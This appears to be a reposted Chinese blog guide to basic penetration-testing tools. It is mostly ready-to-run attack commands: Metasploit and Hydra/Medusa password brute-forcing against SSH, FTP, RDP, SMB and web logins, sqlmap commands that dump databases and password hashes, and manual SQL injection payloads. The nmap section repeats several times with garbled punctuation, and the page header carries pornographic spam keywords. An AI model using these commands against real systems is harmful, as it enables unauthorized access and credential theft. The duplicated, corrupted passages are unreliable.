日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

渗透测试基础总结(脚本小子)

發(fā)布時(shí)間:2023/12/14 编程问答 44 豆豆
生活随笔 收集整理的這篇文章主要介紹了 渗透测试基础总结(脚本小子) 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

(在文檔中做的時(shí)候都有圖片,需要圖片學(xué)習(xí)可D)

一、端口掃描工具

Nmap

1) 獲取遠(yuǎn)程主機(jī)的系統(tǒng)類型及開(kāi)放端口

nmap -sS -P0 -sV -O <target>

這里的 < target > 可以是單一 IP, 或主機(jī)名,或域名,或子網(wǎng)

-sS TCP SYN 掃描 (又稱半開(kāi)放,或隱身掃描)
-P0 允許你關(guān)閉 ICMP pings.
-sV 打開(kāi)系統(tǒng)版本檢測(cè)
-O 嘗試識(shí)別遠(yuǎn)程操作系統(tǒng)

其它選項(xiàng):

-A 同時(shí)打開(kāi)操作系統(tǒng)指紋和版本檢測(cè)
-v 詳細(xì)輸出掃描情況.

nmap -sS -P0 -A -v < target >

2) 列出開(kāi)放了指定端口的主機(jī)列表

nmap -sT -p 80 -oG – 192.168.1.* | grep open

3) 在網(wǎng)絡(luò)尋找所有在線主機(jī)

nmap -sP 192.168.0.*

或者也可用以下命令:

nmap -sP 192.168.0.0/24

指定 subnet

4) Ping 指定范圍內(nèi)的 IP 地址

nmap -sP 192.168.1.100-254

5) 在某段子網(wǎng)上查找未占用的 IP

nmap -T4 -sP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp

6) 在局域網(wǎng)上掃找 Conficker 蠕蟲(chóng)病毒

nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.0.1-254

7) 掃描網(wǎng)絡(luò)上的惡意接入點(diǎn) (rogue APs).

nmap -A -p1-85,113,443,8080-8100 -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan 10.0.0.0/8

8 ) 使用誘餌掃描方法來(lái)掃描主機(jī)端口

sudo nmap -sS 192.168.0.10 -D 192.168.0.2

9) 為一個(gè)子網(wǎng)列出反向 DNS 記錄

nmap -R -sL 209.85.229.99/27 | awk {if($3=="not")print"("$2") no PTR";else print$3" is "$2} | grep

10) 顯示網(wǎng)絡(luò)上共有多少臺(tái) Linux 及 Win 設(shè)備?

sudo nmap -F -O 192.168.0.1-255 | grep "Running: " > /tmp/os; echo "$(cat /tmp/os | grep Linux | wc -l) Linux device(s)"; echo "$(cat /tmp/os | grep Windows | wc -l) Window(s) device"

nmap -sP 192.168.1.0/24
  僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
  nmap -sL 192.168.1.0/24
  探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(-PS22232580)
  nmap -PS 192.168.1.234
  使用UDP ping探測(cè)主機(jī):
  nmap -PU 192.168.1.0/24
  使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
  nmap -sS 192.168.1.0/24
  當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
  nmap -sT 192.168.1.0/24
  UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
  nmap -sU 192.168.1.0/24
  確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCPICMPIGMP):
  nmap -sO 192.168.1.19
  探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
  nmap -O 192.168.1.19
  nmap -A 192.168.1.19
  另外,nmap官方文檔中的例子:
  nmap -v scanme.
  這個(gè)選項(xiàng)掃描主機(jī)scanme 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
  nmap -sS -O scanme./24
  進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
  nmap -sV -p 22531101434564 198.116.0-255.1-127
  進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshdDNSimapd4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
  nmap -v -iR 100000 -P0 -p 80
  隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
  nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
  掃描4096個(gè)IP地址,查找Web服務(wù)器(ping),將結(jié)果以GrepXML格式保存。
  host -l | cut -d -f 4 | nmap -v -iL -
  進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
  其他選項(xiàng):
  -p (只掃描指定的端口)
  單個(gè)端口和用連字符表示的端口范 ( 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53111137T:21-25801398080 將掃描UDP 端口53111,和137,同時(shí)掃描列出的TCP端口。
  -F (快速 (有限的端口) 掃描)nmap -sP 192.168.1.0/24
  僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
  nmap -sL 192.168.1.0/24
  探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(-PS22232580)
  nmap -PS 192.168.1.234
  使用UDP ping探測(cè)主機(jī):
  nmap -PU 192.168.1.0/24
  使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
  nmap -sS 192.168.1.0/24
  當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
  nmap -sT 192.168.1.0/24
  UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
  nmap -sU 192.168.1.0/24
  確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCPICMPIGMP):
  nmap -sO 192.168.1.19
  探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
  nmap -O 192.168.1.19
  nmap -A 192.168.1.19
  另外,nmap官方文檔中的例子:
  nmap -v scanme.
  這個(gè)選項(xiàng)掃描主機(jī)scanme 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
  nmap -sS -O scanme./24
  進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
  nmap -sV -p 22531101434564 198.116.0-255.1-127
  進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshdDNSimapd4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
  nmap -v -iR 100000 -P0 -p 80
  隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
  nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
  掃描4096個(gè)IP地址,查找Web服務(wù)器(ping),將結(jié)果以GrepXML格式保存。
  host -l | cut -d -f 4 | nmap -v -iL -
  進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
  其他選項(xiàng):
  -p (只掃描指定的端口)
  單個(gè)端口和用連字符表示的端口范 ( 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53111137T:21-25801398080 將掃描UDP 端口53111,和137,同時(shí)掃描列出的TCP端口。
  -F (快速 (有限的端口) 掃描)nmap -sP 192.168.1.0/24
  僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
  nmap -sL 192.168.1.0/24
  探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(-PS22232580)
  nmap -PS 192.168.1.234
  使用UDP ping探測(cè)主機(jī):
  nmap -PU 192.168.1.0/24
  使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
  nmap -sS 192.168.1.0/24
  當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
  nmap -sT 192.168.1.0/24
  UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
  nmap -sU 192.168.1.0/24
  確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCPICMPIGMP):
  nmap -sO 192.168.1.19
  探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
  nmap -O 192.168.1.19
  nmap -A 192.168.1.19
  另外,nmap官方文檔中的例子:
  nmap -v scanme.
  這個(gè)選項(xiàng)掃描主機(jī)scanme 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
  nmap -sS -O scanme./24
  進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
  nmap -sV -p 22531101434564 198.116.0-255.1-127
  進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshdDNSimapd4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
  nmap -v -iR 100000 -P0 -p 80
  隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
  nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
  掃描4096個(gè)IP地址,查找Web服務(wù)器(ping),將結(jié)果以GrepXML格式保存。
  host -l | cut -d -f 4 | nmap -v -iL -
  進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
  其他選項(xiàng):
  -p (只掃描指定的端口)
  單個(gè)端口和用連字符表示的端口范 ( 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53111137T:21-25801398080 將掃描UDP 端口53111,和137,同時(shí)掃描列出的TCP端口。
  -F (快速 (有限的端口) 掃描)

二、中間人攻擊arp工具

Ettercap:登錄 - 推酷

Cain:技術(shù)成就夢(mèng)想51CTO-中國(guó)領(lǐng)先的IT技術(shù)網(wǎng)站

三、破解工具

1.Metasploit:MSF破解ssh

msf:(全稱)metasploit freamwork

使用命令:?? 破解ssh登錄名和密碼????????????????????????????????????????????????????????????

msconsole回車

search ssh? 查找ssh相關(guān)的模塊

use auxiliary/scanner/ssh/ssh_login? 調(diào)用ssh破解程序???????????????

show options??? 查看選項(xiàng)

set rhosts 127.0.0.1 設(shè)置要破解的IP地址(必須能ping通)

set rport 22??? 設(shè)置端口

set username root 設(shè)置用戶名

set pass_file /root/*.*? 設(shè)置密碼文件

set threads 50?? 設(shè)置線程50

run?? 開(kāi)始執(zhí)行

telnet同理,

kali自帶密碼字典路徑//usr/share/wordlists/w3af.txt

注:所有路徑必須是絕對(duì)路徑nmap -sP 192.168.1.0/24
  僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
  nmap -sL 192.168.1.0/24
  探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(如-PS22,23,25,80):
  nmap -PS 192.168.1.234
  使用UDP ping探測(cè)主機(jī):
  nmap -PU 192.168.1.0/24
  使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
  nmap -sS 192.168.1.0/24
  當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
  nmap -sT 192.168.1.0/24
  UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
  nmap -sU 192.168.1.0/24
  確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCP,ICMP,IGMP等):
  nmap -sO 192.168.1.19
  探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
  nmap -O 192.168.1.19
  nmap -A 192.168.1.19
  另外,nmap官方文檔中的例子:
  nmap -v scanme.
  這個(gè)選項(xiàng)掃描主機(jī)scanme中 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
  nmap -sS -O scanme./24
  進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
  nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
  進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B類188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshd、DNS、imapd或4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
  nmap -v -iR 100000 -P0 -p 80
  隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
  nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
  掃描4096個(gè)IP地址,查找Web服務(wù)器(不ping),將結(jié)果以Grep和XML格式保存。
  host -l | cut -d -f 4 | nmap -v -iL -
  進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
  其他選項(xiàng):
  -p (只掃描指定的端口)
  單個(gè)端口和用連字符表示的端口范 圍(如 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53,111,137,T:21-25,80,139,8080 將掃描UDP 端口53,111,和137,同時(shí)掃描列出的TCP端口。
  -F (快速 (有限的端口) 掃描)nmap -sP 192.168.1.0/24
  僅列出指定網(wǎng)絡(luò)上的每臺(tái)主機(jī),不發(fā)送任何報(bào)文到目標(biāo)主機(jī):
  nmap -sL 192.168.1.0/24
  探測(cè)目標(biāo)主機(jī)開(kāi)放的端口,可以指定一個(gè)以逗號(hào)分隔的端口列表(如-PS22,23,25,80):
  nmap -PS 192.168.1.234
  使用UDP ping探測(cè)主機(jī):
  nmap -PU 192.168.1.0/24
  使用頻率最高的掃描選項(xiàng):SYN掃描,又稱為半開(kāi)放掃描,它不打開(kāi)一個(gè)完全的TCP連接,執(zhí)行得很快:
  nmap -sS 192.168.1.0/24
  當(dāng)SYN掃描不能用時(shí),TCP Connect()掃描就是默認(rèn)的TCP掃描:
  nmap -sT 192.168.1.0/24
  UDP掃描用-sU選項(xiàng),UDP掃描發(fā)送空的(沒(méi)有數(shù)據(jù))UDP報(bào)頭到每個(gè)目標(biāo)端口:
  nmap -sU 192.168.1.0/24
  確定目標(biāo)機(jī)支持哪些IP協(xié)議 (TCP,ICMP,IGMP等):
  nmap -sO 192.168.1.19
  探測(cè)目標(biāo)主機(jī)的操作系統(tǒng):
  nmap -O 192.168.1.19
  nmap -A 192.168.1.19
  另外,nmap官方文檔中的例子:
  nmap -v scanme.
  這個(gè)選項(xiàng)掃描主機(jī)scanme中 所有的保留TCP端口。選項(xiàng)-v啟用細(xì)節(jié)模式。
  nmap -sS -O scanme./24
  進(jìn)行秘密SYN掃描,對(duì)象為主機(jī)Saznme所在的“C類”網(wǎng)段的255臺(tái)主機(jī)。同時(shí)嘗試確定每臺(tái)工作主機(jī)的操作系統(tǒng)類型。因?yàn)檫M(jìn)行SYN掃描和操作系統(tǒng)檢測(cè),這個(gè)掃描需要有根權(quán)限。
  nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127
  進(jìn)行主機(jī)列舉和TCP掃描,對(duì)象為B類188.116網(wǎng)段中255個(gè)8位子網(wǎng)。這個(gè)測(cè)試用于確定系統(tǒng)是否運(yùn)行了sshd、DNS、imapd或4564端口。如果這些端口打開(kāi),將使用版本檢測(cè)來(lái)確定哪種應(yīng)用在運(yùn)行。
  nmap -v -iR 100000 -P0 -p 80
  隨機(jī)選擇100000臺(tái)主機(jī)掃描是否運(yùn)行Web服務(wù)器(80端口)。由起始階段發(fā)送探測(cè)報(bào)文來(lái)確定主機(jī)是否工作非常浪費(fèi)時(shí)間,而且只需探測(cè)主機(jī)的一個(gè)端口,因 此使用-P0禁止對(duì)主機(jī)列表。
  nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20
  掃描4096個(gè)IP地址,查找Web服務(wù)器(不ping),將結(jié)果以Grep和XML格式保存。
  host -l | cut -d -f 4 | nmap -v -iL -
  進(jìn)行DNS區(qū)域傳輸,以發(fā)現(xiàn)中的主機(jī),然后將IP地址提供給 Nmap。上述命令用于GNU/Linux -- 其它系統(tǒng)進(jìn)行區(qū)域傳輸時(shí)有不同的命令。
  其他選項(xiàng):
  -p (只掃描指定的端口)
  單個(gè)端口和用連字符表示的端口范 圍(如 1-1023)都可以。當(dāng)既掃描TCP端口又掃描UDP端口時(shí),可以通過(guò)在端口號(hào)前加上T: 或者U:指定協(xié)議。 協(xié)議限定符一直有效直到指定另一個(gè)。 例如,參數(shù) -p U:53,111,137,T:21-25,80,139,8080 將掃描UDP 端口53,111,和137,同時(shí)掃描列出的TCP端口。
  -F (快速 (有限的端口) 掃描)

MSF滲透掃描模塊:

http://qqhack8.blog.163.com/blog/static/114147985201473111827882??

2.Hydra破解

1、破解ssh:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh

hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認(rèn)16) -vV

hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

3、get方式提交,破解web登錄:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.
PHP

4、post方式提交,破解web登錄:

hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

(參數(shù)說(shuō)明:-t同時(shí)線程數(shù)3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當(dāng)破解了一個(gè)密碼就停止, 10.36.16.18目標(biāo)ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中的內(nèi)容是表示錯(cuò)誤猜解的返回信息提示。)

5、破解https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6、破解teamspeak:

hydra -l 用戶名 -P 密碼字典 -s 端口號(hào) -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt 10.36.16.18 cisco

hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

參考網(wǎng)址:http://www.linuxde.net/2013/01/11487.html

3.Medusa暴力破解遠(yuǎn)程

?? kali?? linux自帶破解工具,使用的時(shí)候要獲得一些必要的信息。

?? 1、目標(biāo)IP地址

?? 2、登錄目標(biāo)的一個(gè)用戶名或者一個(gè)用戶名文件(都是猜測(cè)的用戶名也可以說(shuō)是用戶名字典)

?? 3、密碼字典

?? 4、要驗(yàn)證的服務(wù)名稱(比如ssh、http、telnet等)

使用命令:

?? ?medusa -h target_ip(攻擊ip) -u username -P path_to_passwordlist(密碼文件要打絕對(duì)路徑) -M ????? ?authentication_service_to_attack(要驗(yàn)證的服務(wù)名稱)

?? ?-u是要攻擊的目標(biāo)的id(用戶名)號(hào),如果改為大寫的U,將會(huì)是利用用戶名列表進(jìn)行攻擊,-M參數(shù)后面接的是你要攻擊的驗(yàn)證服務(wù)名稱。

參考網(wǎng)址:http://www.shangxueba.com/jingyan/1597226.html

4.payload破解

search tomcat查看tomcat的payload

payload就是加載模塊調(diào)用攻擊的有效加載項(xiàng)。(真心抽象)

msfconsole回車

use auxiliary/scanner/http/tomcat_mgr_login?? 調(diào)用tomcat破解程序

show options??? 查看選項(xiàng)

set rhosts 127.0.0.1 設(shè)置要破解的IP地址(必須能ping通)

set rport 8080??? 設(shè)置端口

set username root 設(shè)置用戶名(set user_file /*/*.*設(shè)置帳號(hào)字典)

set pass_file /root/*.*? 設(shè)置密碼字典

set threads 50?? 設(shè)置線程50

run?? 開(kāi)始執(zhí)行。

注:所有路徑必須是絕對(duì)路徑。

四.Sql注入工具

1.Sqlmap

sqlmap:數(shù)據(jù)庫(kù)注入工具。

可以用來(lái)猜測(cè)數(shù)據(jù)庫(kù)類型和利用漏洞滲透數(shù)據(jù)庫(kù)

注入點(diǎn)一般存在登錄頁(yè)面、查找頁(yè)面或添加頁(yè)面等用戶可以查找或修改數(shù)據(jù)的地方。

比如:最常用的尋找SQL注入點(diǎn)的方法,是在網(wǎng)站中尋找如下形式的頁(yè)面鏈接:http://www.xxx.com/xxx.asp?id=YY

?其中“YY”可能是數(shù)字,也有可能是字符串,分別被稱為整數(shù)類型數(shù)據(jù)或者字符型數(shù)據(jù)。

一般有一下幾種方法:

1、加? '? 法

瀏覽器可能會(huì)返回類似于下面的錯(cuò)誤提示信息:Microsoft JET Database Engine 錯(cuò)誤’80040e14表示有注入點(diǎn)。

2、and 1=1 和and 1=2 將and 1=1 寫在url最后面訪問(wèn)顯示正常,而and 1=2 提示錯(cuò)誤說(shuō)明有可能有注入點(diǎn)。如果兩種方式結(jié)果一樣,就表示沒(méi)戲。

3、sqlmap下輸入?? (-u "域名" --level 5 --dbs)? 猜測(cè)數(shù)據(jù)庫(kù)類型

Sqlmap參數(shù)使用

BT5里面的話前面就要加python

sqlmap.py -u url --dbs //爆數(shù)據(jù)庫(kù)

sqlmap.py -u url --current-db //爆當(dāng)前庫(kù)

sqlmap.py -u url --current-user //爆當(dāng)前用戶

sqlmap.py -u url --users?? 查看用戶權(quán)限

sqlmap.py -u url --tables -D 數(shù)據(jù)庫(kù) //爆表段

sqlmap.py -u url --columns -T 表段 -D 數(shù)據(jù)庫(kù) //爆字段

sqlmap.py -u url --dump -C 字段 -T 表段 -D 數(shù)據(jù)庫(kù) //猜解

sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 數(shù)據(jù)庫(kù) //猜解1到3的字段

加入python環(huán)境使用方法:

sqlmap.py -u url? 判斷

sqlmap.py -u url --is-dba -v? 這是判斷當(dāng)前數(shù)據(jù)庫(kù)的使用者是否是dba

sqlmap.py -u url --users -v 0? 這句的目的是列舉數(shù)據(jù)庫(kù)的用戶

sqlmap.py -u url --passwords -v 0這句的目的是獲取數(shù)據(jù)庫(kù)用戶的密碼

sqlmap.py -u url --privileges -v 0 這是判斷當(dāng)前的權(quán)限

sqlmap.py -u url --dbs -v 0 這句的目的是將所有的數(shù)據(jù)庫(kù)列出來(lái)

sqlmap.py -u url --tables -D '表' 爆表

sqlmap.py -u url --columns -T ‘表’-D ‘?dāng)?shù)據(jù)庫(kù)’爆列

sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 這里是查詢第2到第4行的內(nèi)

sqlmap.py -u url --dump -all -v 0 爆數(shù)據(jù)庫(kù)

sqlmap.py -u url --users --password 爆用戶名密碼。

2.明小子Domain

明小子domian工具是針對(duì)Access、mssql數(shù)據(jù)庫(kù)的sql注入工具,另外此工具可用于掃描管理后臺(tái)、上傳、下載路徑,也可進(jìn)行簡(jiǎn)單的md5破解!(此工具功能性有限)

使用方法:

1、先打開(kāi)我們的明小子,在當(dāng)前路徑這里輸入你要注入的網(wǎng)站地址,然后連接如下圖。如果此網(wǎng)站有注入點(diǎn)的話,下面注入點(diǎn)框內(nèi)會(huì)出現(xiàn)紅色的注入點(diǎn)地址。

2、我們?nèi)我膺x中一個(gè)地址單擊鼠標(biāo)右鍵,點(diǎn)擊檢測(cè)注入。

3、然后點(diǎn)擊開(kāi)始檢測(cè)按鈕后。

最后我們得到網(wǎng)站的賬號(hào)密碼后 就可以去網(wǎng)站后臺(tái)去登錄了

3.Pangolin穿山甲

初始界面

輸入url地址進(jìn)行檢測(cè)

參考地址:http://www.hack80.com/thread-758-1-1.html

4.純手工sql注入

第一步先把IE菜單=>工具=>Internet選項(xiàng)=>高級(jí)=>顯示友好 HTTP 錯(cuò)誤信息前面的勾去掉。否則,不論服務(wù)器返回什么錯(cuò)誤,IE都只顯示為HTTP 500服務(wù)器錯(cuò)誤,不能獲得更多的提示信息。

數(shù)字型:and 1=1 and 1=2 判斷是否存在注入

字符型:' and '1'='1 ' and '1'='2

搜索型: 關(guān)鍵字%' and 1=1 and '%'='% 關(guān)鍵字%' and 1=2 and '%'='%

IIS報(bào)錯(cuò)情況下使用:

and user>0 (判斷是ACCESS還是MSSQL)

不報(bào)錯(cuò)則使用各自數(shù)據(jù)庫(kù)特性來(lái)判斷

and (select count(*) from msysobjects)>0 (返回權(quán)限不足access數(shù)據(jù)庫(kù))

and (select count(*) from sysobjects)>0 (返回正常則為MSSQL數(shù)據(jù)庫(kù))

and db_name()>0 (返回?cái)?shù)據(jù)庫(kù)名)

and 0<>(select @@version)-- (判斷版本信息)

and db_name()>0 (返回?cái)?shù)據(jù)庫(kù)名)

************注意:猜解之前先要找到后臺(tái)地址,不然白忙了**********

ACCESS注入:

猜解表名(正常則存在admin,不正常則不存在)

